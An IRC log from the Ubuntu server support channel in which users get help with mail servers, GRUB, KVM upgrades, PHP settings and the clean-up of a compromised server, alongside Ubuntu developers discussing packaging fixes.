<DarkStar1> Aah crap can someone help me pls. it seems I have a runaway telnet process
<DarkStar1> I was just trying to telnet into the imap port and couldn't so when I grep'ed the process I realise that I couldn't kill it.
<DarkStar1> every time i grep it (ps -ef | grep telnet) I find it has a different pid
<DarkStar1> how can I kill it?
<TJ-> DarkStar1: Â£killall telnet"
<TJ-> DarkStar1: "killall telnet"
<DarkStar1> doesn't work
<DarkStar1> I get a no process found
<TJ-> DarkStar1: Is a shell process re-spawning it? If so, kill the parent process (the PPID is the column after the PID in "ps -efly" output)
<TJ-> DarkStar1: Are you trying to kill the telnetd service by any chance?
<TJ-> that's not the 'telnet' client of course
<DarkStar1> TJ-: was trying to kill the client
<DarkStar1> I can't nor it seems can I kill the parent
<DarkStar1> How can I stop the service?
<TJ-> DarkStar1: Well you must have something set to respawn it if you're seeing lots of different PIDs for the telnet client
<TJ-> DarkStar1: "sudo service <service-name> stop"
<DarkStar1> didn't work. doesn't recognise telnet
<TJ-> DarkStar1: Well no, because the service is a daemon, so it'd be "telnetd" if anything. But that won't stop your telnet client running
<DarkStar1> but it should stop a respawn right?
<DarkStar1> TJ-: not telnetd either
<TJ-> DarkStar1: nope. Services are set to respawn if they stop, for obvious reasons. That doesn't affect any clients for the protocols those services answer to locally
<TJ-> DarkStar1: going back to the beginning - when you used the 'telnet' client on the DreamHost/GoDaddy VPSes to test the SMTP connection to Linode, what was the *exact* command-line you used to start telnet?
<DarkStar1> TJ-:  I did a "telnet localhost imap2"
<dsavi> TJ-, I think you're thinking of me not DarkStar1
<DarkStar1> then in the interactive mode (whilst trying to test the courier imap server) typed a 'AB LOGIN "user" "secret"
<DarkStar1> then killed the process by pressing a ctrl+c
<DarkStar1> because I had to do something but couldn't exit telnet for some reason
<TJ-> dsavi: I admit things are confusing! I got your SMPT issue confused with DarkStar1's telnet issue!
<DarkStar1> :)
<dsavi> TJ-, Haha, well, that happens :)
<TJ-> Can't you both just get together and merge the working parts of your mail servers? :P
<dsavi> Haha :D
<DarkStar1> sure
<dsavi> The ironic thing is that I'm setting this up so I can receive *ONE* email from Amazon SES so I can migrate our email delivery to them
<DarkStar1> I only need telnet to test that the imap server is up and running anyway. The bigger issue is setting up dovecot to which I need help really badly
<DarkStar1> for which*
<TJ-> DarkStar1: the mysql parts? The only thing I recall is, I had to ensure that the query was selecting the correct columns from the correct table in the correct database - all pretty obvious
<TJ-> dsavi: On your problem of SMTP not connecting - I was wondering if you were trying to use 'telnet' from Dreamhost/GoDaddy to Linode, and if so, if you were doing "telnet <mailserver-ip> 25" ?
<dsavi> TJ-, I did telnet mydomain.com smtp
<dsavi> I'll try 25
<dsavi> TJ-, 25 and smtp have the same results
<TJ-> dsavi: That was my point - making sure you were specifying the destination port :)
<dsavi> TJ-, but really, this telnet thing is irrelevant, my real issue is that my domain doesn't receive email
<dsavi> TJ-, I try to send email to one address, and I get this error from GMail: Google tried to deliver your message, but it was rejected by the recipient domain. The error that the other server returned was: 553 553 Unknown recipient. (state 13).
<TJ-> dsavi: Have you checked the entire path, starting with the MX records in DNS?
<dsavi> TJ-, here's where the problem begins, I don't currently have access to change the MX records
<TJ-> dsavi: It could be that the Google mail-servers are using a different mail-exchanger than the one you're expecting. DNS zone changes can take time to propagate
<TJ-> dsavi: Does the current MX for the domain match the server you're working on?
<dsavi> TJ-, it doesn't, but since the linode guide said nothing about changing the mx records, I thought that the server specified in the mx records might be pre configured correctly, and that my server was the one with bad config
<TJ-> dsavi: The MX record is the authority on where mail for the domain is delivered. All MTAs look up that when determining where to deliver email to. You can check it using "dig -t MX <domain.tld>"
<TJ-> dsavi: (do the 'dig' from another system, not the server in question nor the server hosting the DNS zone!)
<DarkStar1> Yeah I thought I had done that correctlyI think my system is too unstable. what's the comand for restart. shutdown -r now doesn't seem to work properly
<DarkStar1> doesn't seem means it's taking a long time to restart
<dsavi> TJ-, yep, did it and the server doesn't match, but I suspect the domain is the one used by linode to redirect mail to their instances
<TJ-> DarkStar1: Sometimes it will if processes are 'stuck'
<DarkStar1> + I get errors when I sudo to root
<DarkStar1> TJ-: it's been like that for a long time now. On two separeat installations
<TJ-> DarkStar1: Some hardware doesn't properly handle the shutdown signal;
<TJ-> dsavi: The only way I can think for you to receive the email, is to create an account on the mail server currently configured in the MX record for the domain, so the server will accept the username@
<dsavi> TJ-, Okay
<dsavi> I'll have to get access to the linode web backend
<dsavi> :/
<TJ-> huh?
<TJ-> dsavi: You mean the email is to an @linode.com username?
<dsavi> TJ-, no, it's account@mydomain.com
<dsavi> But I don't have access to the linode control panel where I could change the mx records for that domain
<dsavi> I'm the server admin and web dev but I haven't needed access to that until now
<TJ-> dsavi: Ahhh, .... drat?
<dsavi> TJ-, Yeah, I'll just have to get my boss to get me access or change the mx records or whatever
<TJ-> dsavi: You could set up a local redirect if all you're doing is testing it. Assuming the mail server is known as "mail.mydomain.tld" you'd add to "/etc/hosts" the line "<mail-server-ip> mail.mydomain.tld" - that way, that system would use '<mail-server-ip>' instead of using a DNS MX lookup
<dsavi> TJ-, All I need is to receive this one email from Amazon web services, so I don't think a local redirect would work
<TJ-> dsavi: Ahhh... can you change the email address the AWS sends to?
<dsavi> TJ-, Here's what I'm trying to do: I want to migrate our email delivery to Amazon Simple Email Service, but to do it, you need to confirm that you control an email address by having a confirmation email sent to it
<TJ-> dsavi: Ahhhh!!!! OK, so there's no way around it then
<dsavi> TJ-, Yeah, email delivery was terrible on our old sendmail setup, got rejected by other servers seemingly at random, so I decided to migrate to Amazon SES or Sendgrid (We chose SES)
<dsavi> So you see my dilemma :P
<TJ-> dsavi: It's chicken-and-egg. Most delivery problems are due to not having correct SPF type records on your DNS that match your mail servers
<dsavi> Yeah
<dsavi> TJ-, Anyway, I need to go now, I think I know what to do next (Change mx records), so thanks a lot for your help :)
<TJ-> Good luck!
<dsavi> :)
<DarkStar1> Which package installs the auth-sql.conf.ext? because it's missing in the conf.d directory
<DarkStar1> for dovecot
<edgy> # dpkg -l linux-headers-`uname -r`
<edgy> No packages found matching linux-headers-3.2.0-31-generic.
<edgy> why there is no headers in the server but there is in the desktop?
<qman__> edgy, that just means it's never been installed on your system
<qman__> apt-cache search linux-headers-`uname -r`
<edgy> qman__: but why it's not installed by default in the server but installed by default in the desktop? why is it needed?
<qman__> edgy, those are part of build tools, which are not included in either by default
<qman__> they may have been added if you installed a driver or software that requires them
<qman__> out of the box, compilers and associated things to compile software (headers and dev packages) are not installed
<edgy> $ apt-cache show linux-headers-`uname -r` |grep Task
<edgy> Task: ubuntu-desktop, ubuntu-usb, edubuntu-desktop, edubuntu-usb, xubuntu-desktop, mythbuntu-frontend, mythbuntu-desktop, mythbuntu-backend-slave, mythbuntu-backend-master, lubuntu-desktop
<edgy> qman__: doesn't this mean it's installed by default with ubuntu-desktop?
<qman__> possibly, it never used to be, but jockey might drag it in
<qman__> or some other software that requires compiling at install
<edgy> qman__: apt-cache show ubuntu-desktop would tell you that it's recommended so it's not that jockey drag it, it's really installed by default
<qman__> oh, that's why
<qman__> recommend
<qman__> recommends only became installed by default a couple years ago
<qman__> but, that is why it gets installed, so that things like DKMS and jockey can compile stuff when you ask them to
<qman__> server doesn't have those things out of the box and as such doesn't need headers either
<edgy> reasonable
<edgy> though now I found it's strange that the headers are recommended for ubuntu-desktop but not kubuntu-desktop
<qman__> does seem strange, but who knows
<edgy> qman__: now the important issue for me is this
<edgy> I am getting "error: physical volume pv0 not found." with grub updates
<edgy> what could be wrong please?
<edgy> there is a bug at https://bugs.launchpad.net/ubuntu/+source/grub2/+bug/1014159 but no response!
<uvirtbot> Launchpad bug 1014159 in grub2 "update-grub error: physical volume pv0 not found." [Undecided,Confirmed]
<qman__> edgy, unfortunately I don't know enough about it to know why that is happening, but it appears that you don't have a volume called pv0, and it's looking for one anyway
<qman__> I'd check out the grub configs and see if anything refers to that
<edgy> qman__: good hint, let me check
<edgy> don't knoq qman__ but when I do grep -r pv0 on /etc/lvm/archive/ there are entries for it
<AaronMickDee> I installed ubuntu server on an old IDE drive. I had an extra SATA drive, so I 'dd if=/dev/sda of=/dev/sdb'. How do I update grub2 to know to boot from /dev/sdb instead of the ide drive?
<edgy> AaronMickDee: aren't you goint to remove the IDE disk?
<edgy> AaronMickDee: I think you just remove the IDE and put the SATA and it would work, if not, run update-grub and it would generate the correct grub.cfg file
<edgy> AaronMickDee: if you want to keep both may be you just need to change hd0 to hd1 in the config file and try
<qman__> AaronMickDee, sudo grub-install /dev/sdb
<qman__> then remove the old disk and you're set
<AaronMickDee> qman: Thanks!
<AlanBell> hi all
<AlanBell> I am contemplating a server upgrade from 10.04 to 12.04 and the server is running KVM with a bunch of assorted VMs on it
<AlanBell> if I pause all the VMs, do a do-release-upgrade and unpause the VMs will they just cheerfully carry on? Anyone tested that?
<qman__> sounds dangerous
<AlanBell> does doesn't it :)
<AlanBell> can you run kvm in an ec2 t1.micro?
<TJ-> AlanBell: I can't think of anything that would knock them out. Do you have any special external devices with virtio ?
<AlanBell> TJ-: no, it is pretty standard local drives on the host
<AlanBell> it kind of sounds dangerous, but the more I think about it the more I think it should work
<TJ-> AlanBell: Will you be changing the kernel version?
<AlanBell> sure, 10.04 to 12.04
<AlanBell> running the standard server kernel
<TJ-> Which AMIs from and to?
<AlanBell> not doing it on Amazon, doing it on real hardware
<AlanBell> the ec2 question was because I was thinking of doing a dry run on ec2
<TJ-> AlanBell: oh OK - your question made me think it was EC2
<AlanBell> I don't have the vt capable hardware kicking about to trial this on
<TJ-> AlanBell: Do you have/can you create enough spare space to install a 12.04 server in parallel, and test it? If you're using LVM for example, that would be trivial to do.
<TJ-> AlanBell: You could even install the 12.04 into a VM on a bare metal/LVM partition to reduce down-time to a bare minimum
<AlanBell> plenty of space, not quite sure I understand that scenario though
<AlanBell> you mean dual boot 12.04?
<TJ-> AlanBell: I was thinking of minimising the time to install a dual-boot for the purposes of testing 12.04 on the bare metal, if keeping the VMs operational is critical
<TJ-> AlanBell: If you can afford for the VMs to be offline then you can do it the other way - from CD/USB live to the new partition/volume
<AlanBell> oh, right, yeah, keeping them operational is kind of critical, but a bit of downtime is OK
<AlanBell> so you are thinking of doing a fresh install of the host and moving the VMs across
<AlanBell> rather than a do-release-upgrade
<qman__> that's what I would do, set up a new server, migrate the VMs
<qman__> and that way if it doesn't work you still have the old one
<TJ-> AlanBell: That's how I usually do it. Create an LV, use it as the device for a VM, install into it, then "update-grub" on the host to add it to the boot menu, then finally reboot the host to test it. Any problems - boot back into the regular OS and read the VMs logs to figure out what went wrong
<TJ-> AlanBell: On my systems everything is LVM - if you have the same option, it makes the move relatively easy to back out of instantly
<TJ-> AlanBell: The VMs don't require much from the host OS so you can do that part of an upgrade test relatively fast. 2nd stage would be a dist-upgrade of the host (assuming you have complex configs that need to be migrated) or else use apt-mark on the host to generate and copy over the list of installed packages to the new 12.04 install.
<AlanBell> yeah, networking config is a bit complex
<TJ-> AlanBell: Then dist-upgrade is probably the final solution, but this allows you to dip your toes in the water so-to-speak, without ending up falling in the river!
<AlanBell> don't have easy access to the grub menu (remote server, can restart remotely console stuff is a pita)
<TJ-> AlanBell: Well that's not insurmountable - I've had that on occasion too. You simply make sure you pre-edit /boot/grub/grub.cfg and set which OS entry should be the default boot entry.
<AlanBell> yeah, was thinking through that
<AlanBell> little bit scary, but should work
<RoyK> not too scary ;)
<TJ-> AlanBell: The other thing is - you might want to check this - but I seem to recall that there was some work underway recently in KVM to support guest-in-guest. If it has landed for kernel 3.2 and the kvm/qemu in 12.04, you could run your VMs from inside a VM running the new 12.04 :s
<AlanBell> yeah, someone told me that earlier, I think I have a chicken and egg problem with that though
<TJ-> AlanBell: So you'd have 10.04(host) > (12.04(guest/host) > VMs
<AlanBell> I think the outer one has to be 12.04 or it doesn't pass the VT flag inwards
<AlanBell> however I might be able to do that on my laptop
<TJ-> AlanBell: Well, you can install the 3.2 kernel on its own to the current 10.04 install, and boot from that. I've done that a few times although I didn't test extensively that *every* possible service still works.
<TJ-> AlanBell: On my systems I have a separate /boot/ that shares kernels and grub across multiple OS versions, so its pretty easy for me to do that.
<AlanBell> yeah, with these I went for a completely default install
<TJ-> 12.04 installer has the option to do complete LVM now
<TJ-> Might be worth migrating to an LVM arrangement at the same time, for future-proofing
 * RoyK is also running lucid on a kvm host and is considering an upgrade
<RoyK> or a bloody reinstall to keep things simple
<AlanBell> RoyK: I think I am going to try the brave upgrade, and file bugs if it doesn't work
 * TJ- hands out the grey hairs :p
 * DarkStar1 grabs a few
 * AlanBell tries try.cloud.ubuntu.com
<AlanBell> if that will run KVM then I can make a 10.04 amazon ami, install kvm and put a vm on it, then upgrade the host and see what happens
<AlanBell> http://paste.ubuntu.com/1252509/ promising
<AlanBell> well I have an hour to play with this thing, it starts running 12.04, lets install kvm, kick off a quantal #desktop install in a vm, then upgrade the host to quantal
<RoyK> AlanBell: an upgrade will most probably work, I've done that a dozen or so times lucid->precise
<AlanBell> yeah, so have I on desktops, just not with kvm running
<RoyK> haven't tried to upgrade kvm hosts yet
<RoyK> that is, I tried once 12.04 was released, and that failed, had to reinstall
<RoyK> but not kvm-related
<AlanBell> there is a real nasty in the release notes, looks like all the KVM vms vanish
<RoyK> where?
<AlanBell> bug 931350
<uvirtbot> Launchpad bug 931350 in virt-manager "vms missing after upgrade from Lucid to Precise" [Undecided,Confirmed] https://launchpad.net/bugs/931350
<AlanBell> kind of a huge issue really, in terms of the likely laundry bills it could cause
<RoyK> heh
<RoyK> flagged "medium"
<RoyK> that's rather hilarious
<AlanBell> and "fixed" in release notes
<TJ-> Amazing it hasn't bee fixed. It's not hard to set-up a Lucid bare metal and test VMM to find out what causes the duplicate entry (to fix that), or to create a simply .postinst script the runs the config through 'sed'
<RoyK> "it's a bug, but it's fixed once we tell people it won't work"?
<TJ-> One of the downsides to a fixed 6-month release cycle - too many bugs and not enough bodies
<RoyK> TJ-: these are LTS releases, not your average 6-month releases
<AlanBell> indeed, this one is rather a minor manual fix to resolve the problem
<TJ-> Makes no difference... the devs are still in the 6-month release cycle
<AlanBell> just rather a distressing situation to discover
<TJ-> AlanBell: At least there was a release-note! You didn't have to suffer the effect and have to find out why
<AlanBell> TJ-: very much so, and a good reminder to always read the release notes it is too!
<TJ-> AlanBell: Yes. It's an underrated pastime
<tomson> Hi guys. How to create user and folder for him, /home/username. 2. how to limit him just to this particular folder? Any help would be appreciated.
<AlanBell> ok, my testing on my hour of Amazon reveals that virt-manager gets disconnected during upgrades and kvm pausing is not the same as suspending, don't think you can pause a vm and reboot and restart it
<AlanBell> best thing to do would be to do a clean shutdown of the guests, do the upgrade and fire them up again
<AlanBell> and fix the xml if they vanish
<AlanBell> nice job for next weekend I think
<Wyleyrabbit> Hi everyone
<Wyleyrabbit> need some help. I just upgraded my Ubuntu 10.04 LTS server to 12.04 LTS, and everything is great...except I can't get php to talk to a database. Also, I'm getting errors in /var/log/apach2/error.log - mod_fcgid segfaults.
<Wyleyrabbit> is this the right channel to be in for this?
<Wyleyrabbit> hello?
<clunkychicken> hi
#ubuntu-server 2013-09-23
<Guest43307> If I set php.ini to use 2gb max memory does php reserve that memory or is that the maximum amount it can use on the server if needed?
<jrwren> max.
<jrwren> it does not reserve
<jrwren> that is also per process, which is effectively per request
<Guest9161> Hi, I have 3 other machines running windows and I would like to make periodic backup of some folders there. Do you know how can I simply do that? ( I am aware of backup tools like bacula, but I am looking for something simpler.)
<mojtaba> Hi, I have 3 other machines running windows and I would like to make periodic backup of some folders there. Do you know how can I simply do that? ( I am aware of backup tools like bacula, but I am looking for something simpler.)
<mojtaba> Hi, I have 3 other machines running windows  in a LAN and I would like to make periodic backup of some folders there. Do you know how can I simply do that? ( I am aware of backup tools like bacula, but I am looking for something simpler.)
<Pingu> codex, you here?
<muindor> hey all
<muindor>  have some kind of problem with installing ubuntu server. got an ibm hardware server here for testing. i set up the raid in bios (lsi megaraid) by setting device options from ide to raid and created a raid 1. now after doing this and trying to boot from the cd, it just kicks me right into some grub shell instead of the usual menue (install ubuntu, install in expert mode etc). im not sure how to go
<muindor> on from this grub shell now
<nikolaj_basher>  Is it posible to har two mail frontend for one server ? It's because i use Ispcp and Im not happy with the mailfront and I would like to have squirrelmail instead
<ruben231> hi guys i have server 12.04 LTS 64bit , would like to ask help coz when i reboot server it stop and get this error ----> http://pastebin.com/cTaD1U35
<ruben231> any idea on this error guys..???
<Rory> That's not an error, ruben231 ...
<Rory> ruben231: Is there anything before or after those two lines?
<ruben231> let me check on it now. thanks
<BrixSat> I cant seem to be able to make nfs server and export to it via internet :/
<Sling> so i have this init.d script for tomcat6, https://gist.github.com/anonymous/6671335 , and I want to use upstart instead
<Sling> there is no magical way to convert this right? :)
<Sling> I found a bare minimal tomcat6 upstart script @ https://gist.github.com/witscher/2924017 , but this is hardly the functionality I have in the init.d script
<jamespage> zul, smoser, adam_g: the openvswitch dkms package in the cloud-archive is hosed right now
<jamespage> fixing in saucy then I'll re-backport
<zul> how so?
<smoser> ok.
<smoser> jamespage, i'm going to upload to cloud-tools-next with ~ctools0. that sound ok?
<smoser> just re-upload everythign with that instead.
<jamespage> smoser, +1
<smoser> it shoudl end up being ok. as those should then be newer and replace the older
<jamespage> smoser, agreed
<jamespage> smoser, can you update the cloud-archive-backport helper to automagically do this please :-)
<smoser> jamespage, yes.
<smoser> stgraber, can you archive admin for me ?
<smoser> i need uvtool out of new. https://launchpad.net/ubuntu/saucy/+queue?queue_state=0&queue_text=
<jamespage> zul, the previous packages where based on snapshots so the boot.sh script that autoconfs was being executed
<jamespage> but not for the release tarball I uploaded
<jamespage> so the dkms packages are missing some headers
<stgraber> smoser: nope, I'm off today
<zul> jamespage:  oh
<smoser> thanks for responding, stgraber. now go 'be off'
<jamespage> zul, yeah - one of those god-awkfull autoreconf patches required.
 * jamespage hates those
<zul> jamespage:  well dont let me bug you
<stickystyle> I have a vsftp server that seems to keep writing to a log file *after* the log has been rotated.  Meaning if there is someone with an active connection and logrotate runs, the old connections will begin (or continue?) writing their entries in vsftpd.log.1 and new connections will write to vsftpd.log.  Not until I completely restart the vsftpd proc will everyone begin writing to the same log file again.  Is this behavior known/expected/bug ? I
<stickystyle> can't recall observing it in any of my other server procs.
<stickystyle> And I say "completely restart" because a simple #service vsftpd restart does not kill off the old connections, I have to go in a #killall vsftpd to make the "old" sessions go away.
<Sammy123> hey there
<Sammy123> I have installed a postfix and mailman combination and am hoping to have configured it correctly
<Sammy123> before I make the server go live, I'd like to test it; however, for that I need to "fake" the address in /etc/hosts (or something similar)
<Sammy123> I want to send a mail to this setup in order to test whether it's correct or nto
<Sammy123> Where I have problems: How do I make the server think it has already the live address; how do I send a mail to it from command line
<LordAioria> one question .. i have installed jailkit, i have created a user into jailkit ... then i have tried to enter with this user using SSH and i received this error : ERROR: failed to execute shell /bin/bash for user XXXX check the permissions and libraries of /opt/jail//bin/bash
<LordAioria> i see that at my folder /opt/jail there isn't any bin folder... i have used jk_cp -v -f /opt/jail /bin/bash
<LordAioria> now i can enter with my user using SSH but ... when i have tried to use a LS command it says : not command found ...
<LordAioria> i see that at /opt/jail there isn't any /opt folder .... is that correct ?
<LordAioria> please i spent 3h looking for a solution
<LordAioria> perfect i have tried to enter with my jailed user with sftp and it doesn't work
<LordAioria> T_T
<halvors> I'm experiencing this issue: https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1186662
<uvirtbot> Launchpad bug 1186662 in isc-dhcp "isc-dhcp-server fails to renew lease file" [Undecided,Triaged]
<halvors> Anyone know about a fix for this?
<halvors> :)
<resno> i need a suggestion from you guys
<resno> setting up a backup server, and a monitoring server and development for my job. should these go offsite, or onsite or cloud...?
<resno> monitoring server is onsite
<resno> actually, all is onsite but i think if this is best method
<LordAioria> one question .. i was following this guide http://www.serverubuntu.it/SFTP-chroot to chroot SFTP users with OpenSSH ... and now i have one user created jailed that works perfect in SFTP (it's jailed) But now i want that the same user allows ssh jailed too..... at creation i have used this : usermod -s /bin/bash myuser instead of /bin/false but when i have tried to enter ssh with this user .... i see this message: This service allows sftp connectio
<mgw> does anyone have an idea on how to monitor lxc container cpu usage? is calculating from cpuacct.usage (over time) and cpushares and cpuset the only way to do it?
#ubuntu-server 2013-09-24
<delinquentme> best way to explicitly allow a python script to write image files into a directory?
<delinquentme> should I be giving the user executing the python files chown of the script and the dir?
<gartral> hey all, I've been fighting with some remote service issues and I can't get my SSH keys to be used, every time I push/change a key, log out and back in in, the server is asking for a password even though i know for a fact a valid key exists on both the server and my desktop
<gartral> this happens even when I do a raw SSH connection
<gartral> resno: that depends on your needs and your funds. how worried are you about data security?
<kevireilly> Hola. I am migrating a couple sites from a cPanel server to an ubuntu server and I need to setup email accounts for each domain. I don't have to make it super easy to maintain or anything, but is anyone aware of any guides or anything specific to look for on this subject?
<kevireilly> I am able to telnet localhost 25 but I am not able to telnet domain.com 25 from my local computer. I've checked the firewall (iptables) and it appears to be appropriate. Even without any rules defined I find the same result. Trying to figure out what else might be at play
<kevireilly> any random stabs in the dark?
<kevireilly> It seems I am able to send mail out, but still unable to confirm that a response can be received back
<kevireilly> ah, my ISP is blocking port 25
<kevireilly> and the return email has been received.. delicious
<ivoks> does anyone has any experience with eurephia plugin for openvpn? :)
<HSaka> Hello, I've instaled mkfs.xfs on my raid, and I'm reciviing this message : http://pastebin.com/rVWnpwwN
<HSaka> What can I do to fix the problem?
<psivaa> hallyn: is there any plan to fix bug 1207675, causing smoke failure on saucy server..
<psivaa> http://reports.qa.ubuntu.com/smokeng/saucy/server/4419/lxc/429415/
<uvirtbot> Launchpad bug 1207675 in ubuntu-test-cases "test_lxc_api test fails during container creation " [Undecided,New] https://launchpad.net/bugs/1207675
<litsand> hello,I want to search all the file with attr ---i----,but  find command seems could not do that.
<litsand> my server has been hacked.and I found some file with the attr --i----.so I want to search all the file .
<Sling> litsand: you mean the immutable bit?
<litsand> yes.
<Ben64> if your server has been hacked, you should wipe it and reinstall
<Ben64> theres no sure way to tell if you got rid of all the stuff
<Sling> you could just navigate to the root of the directory structure you want to search and use lsattr -R | grep "-i-"
<Sling> as a quick hack
<Sling> Ben64: thats not really an option usually :)
<Ben64> it should be
<Sling> also you don't know what security measures are in place
<Ben64> apparently not enough
<Sling> for example I use chrooted webfolders for shared servers
<Sling> single site gets hacked due to an old CMS or guessed/leaked password, only 1 site is compromised
<Sling> no need to reinstall the server due to that
<ikonia> yes there is
<Ben64> if they got root who knows what they could have done
<ikonia> as you don't know what the exploit has done
<Sling> of course you will need to do additional checks, have some form of intrusion detection system, external logging
<ikonia> it is the only way to have confidence
<ikonia> you can't "check" after the exploit
<Sling> yes you can
<Sling> its called forensics
<Ben64> what if they modified executables
<ikonia> I'm sorry but I disagree as the tools you use are not to be trusted
<litsand> Sling thanks.thanks all~
<Sling> who says you use tools on that system
<Sling> don't assume so much :)
<Sling> and Ben64, they didn't get root in that case
<ikonia> you have to be realistic abou tit
<ikonia> you're not going to start pulling disks out of other machines
<Sling> most 'hacks' are not due to root access being compromised
<Sling> but due to FTP accounts being compromised
<Sling> depends on the situation of course, but from my experience with shared hosting setups
<Ben64> assuming best case scenario is asking for trouble
<ikonia> you don't know though
<ikonia> you can't assume they didn't get root
<ikonia> or they didn't do something
<Sling> ..
<ikonia> it's all "guess" or "hope" the only way is to do a clean install or as you say move the data to another machine and check it properly
<Sling> did you read what I wrote?
<Sling> external logging, forensics
<Ben64> the time it would take to go through every file and make sure its ok, you could have reinstalled everything already
<Sling> also, there is selinux/grsecurity and mounting system files readonly, etc
<ikonia> not on ubuntu
<Sling> you don't need to go trough every file
<Sling> ikonia: what not on ubuntu?
<ikonia> selinux by default
<Sling> no, not by default
<litsand> ^ ^.I think it is a hard way to clean a hacked server.But there is also a way to do it.It depends on your skills.
<uvirtbot> litsand: Error: "^.I" is not a valid command.
<ikonia> you'd need to set that up - which doing so post copromise seems invalid
<Sling> but a default install is not what you use in a hardened production environment
<Sling> if you do use the default, then sure reinstall
<Sling> and of course you dont do that post hack, obviously
<Ben64> and you say i'm assuming too much...
<ikonia> pretty much everyone who says "I've been hacked" in this channels is due to using defaults
<Sling> perhaps im not used to the ubuntu level of sysadmins :)
<ikonia> Sling: yes, you'll find the people who know what they are doing/don't use defaults are not in a channel asking "I'm hacked what do I do"
<litsand> all right.thanks for your help.I got what i want.
<aandy> hi guys, i've used BIND (named) and dnsmasq for a while now, and i'm contemplating setting up a nameserver for a new domain i've purchased. no question i can set it up with BIND, but i'm wondering if others have (good) experience with another name server soft?
<ikonia> aandy: the "internet" uses bind....for a reason
<aandy> e.g. that it managed large zones ;)
<andol> aandy: There are some people who prefer PowerDNS, since it allows them to user other backends than flat files.
<aandy> andol: ah, hadn't heard of powerdns. i'll check it out, thanks
<andol> aandy: But most important, do you know why you want to run your own authorative DNS servers, instead of just going with a DNS hosting provider? There are some good reasons to run your own DNS, but it does require a bit of an effort to get it good enough that you actually benefit from it.
<andol> aandy: Of course, learning can itself be a good enough reason :)
<aandy> andol: yes, i'm aware. i'll might need an "easier" way to administrate subdomains. i also might not, but either way i'd like to give it a go :) so yeah, learning is a big part of it
<aandy> i've run some reverse dns zones before, and two domain zones (both in bind), i just wanted to check if there were alternatives - not because bind sucks ;)
<andol> aandy: Fair enough. Just throught that last comment out there since you never know with random people on IRC, and because I have definetly seen people who shouldn't run their own DNS do so.
<aandy> andol: hehe, duely noted, and i appreciate your concern. depending on how this project pans out, we might not even need it. but we probably will
<jamespage> adam_g, how much have you tested the havana support across the charms? hitting a context call ordering issue with neutron
<jamespage> neutron < nova and neutron packages get called in the nova context....
<jamespage> (nova-compute charm)
<zul> jamespage: new novaclient coming down the pipe
<jamespage> zul, great
<hallyn> psivaa: oh, hm.  please do mark those as also affecting lxc, else i don't find them.
<hallyn> Not obvious from the report what is actually failing, will have to reproduce
<psivaa> hallyn: ok, ill mark it as affecting lvm
<psivaa> *lxc
<zul> jamespage: btw i got the glance tests working again on friday so i can melt your laptop for you
<zul> jamespage/roaksoax: https://code.launchpad.net/~zulcss/python-novaclient/2.15.0/+merge/187233
<resno> for people with servers in a datacenter, do you do backups onsite? off site? and where do you handle montiroing?
<ikonia> depends on many things, it's part of estate planning
<zul> jamespage/roaksoax: https://code.launchpad.net/~zulcss/keystone/oauth-refresh/+merge/187239
<jamespage> adam_g, urgh - I'm getting lost in how the quantum/neutron stuff works in nova-compute
<hallyn> psivaa: remind me, is the utah testsuite only run on saucy?
<psivaa> hallyn: no, as a host raring, precise also work
<psivaa> hallyn: i mean utah can be installed and run on raring as well and our test servers are precise machines
<hallyn> psivaa: test servers are precise, but they run the tests on saucy vms don't they?
<psivaa> hallyn: right
<ihre> I've mounted the backuppc pool on a seperate raid1 disk, yet it seems that space used on /var/lib/backuppc is also being count on the actual /var partition: http://dpaste.com/1394441 Why is this happening, and how should I fix it?
<andol> ihre: the ncdu output you are wondering about?
<andol> I mean, the df output looks like of as expected?
<ihre> andol: well, after I've unmounted /var/lib/backuppc, df -h still shows 14G in use on /var, while ncdu reports ALOT less
<andol> ihre: Perhaps you really have 14G under /var, not counting /var/lib/backuppc?
<andol> ihre: That the problem being that ncdu isn't diplaying that for some reason. Also, instead of looking at /var from within you might get a truer result by looking at from the outside, like doing ncdu /var alt du /var.
<andol> ihre: Could possibly also being an issue with unlinked inodes still being kept alive due to some process still having a hold on them, that being reported differently by (nc)du vs. df
<psivaa> hallyn: i assume you've been able to reproduce the bug?
<ihre> andol: I'm running du -hsx /var at the moment, i'll report it asap
<hallyn> psivaa: a bug, yes.  just pushed a fix, now to test it :)
<psivaa> hallyn: ack, thanks :)
<ihre> andol: du -hsx /var: 2.7G    /var/
<ihre> andol: How can I check for unlinked inodes, then?
<andol> Not sure what the best option is, but I've used lsof now and then to figure such things out.
<andol> Depending on the machine in question you could always reboot of course :)
<ihre> sure, but this is the second time it is happening now
<hallyn> psivaa: yeah that fixed the lxc_test_api which was the first failure I hit.  I'm going to mark it fix resolved in the bug, but if you hit another one pls do reopen.
<andol> ihre: In that case I don't know.
<psivaa> hallyn: ok, will do
<hallyn> thanks :)  ttyl
 * hallyn biab
<ihre> andol: thanks anyway, i'll start digging into unlinked inodes then
<arosales> smoser, jamespage fyi I added caribou to a the meeting for a regular slot on "Server and Cloud bugs" that need some focus on, and aren't covered in the development section
<arosales> https://wiki.ubuntu.com/ServerTeam/Meeting updated
<jamespage> arosales, ok
<linuxr> Hi all. I have a question related to the nice piece of software known as AppArmor. Is it somehow possible to list the apparmor rules for a process currently being active ?
<linuxr> (I need to make sure that all my rules have been properly loaded)
<adam_g> jamespage, the idea was that places where things had been named quantum-* (eg, config-get quantum_plugin , relation-get network_manager) would first query for the new neutron_* variation, then legacy quantujm_*
<jjohansen> linuxr: list what is in the kernel? No, they are compiled into a an atomata. Saucy's kernel has a new feature that exports a hash value for each profile, you can use a userspace tool to compare the userspace compile to what is in the kernel
<jamespage> adam_g, getting my head around it slowly
<jamespage> *its hard*
<jamespage> adam_g, I just pushed a few more havana fixes for glance and cinder
<jamespage> the keyring for ceph was getting created with restricted permissions causing the daemons to stop
<linuxr> jjohansen, who is saucy? :)
<jjohansen> linuxr: sorry saucy salamander is the development name of ubuntu 13.10
<linuxr> ah lol..okay jjohansen , thanks!
<zul> adam_g: something weird with your merge request for troveclient
<adam_g> jamespage, http://paste.ubuntu.com/6150766/ this should be what determines whether or not nova-compute is using quantum, neutron, or flatdhcp
<adam_g> jamespage, _network_config() is basically just getting ['network_manager', 'neutron_plugin', 'quantum_plugin'] from the cloud-compute relation
<jamespage> adam_g, gotcha
<jamespage> adam_g, hitting a bug right now with havana
<jamespage> /etc/neutron is not created by the time the charm tries to write neutron.conf
<adam_g> jamespage, you got a paste by chance?
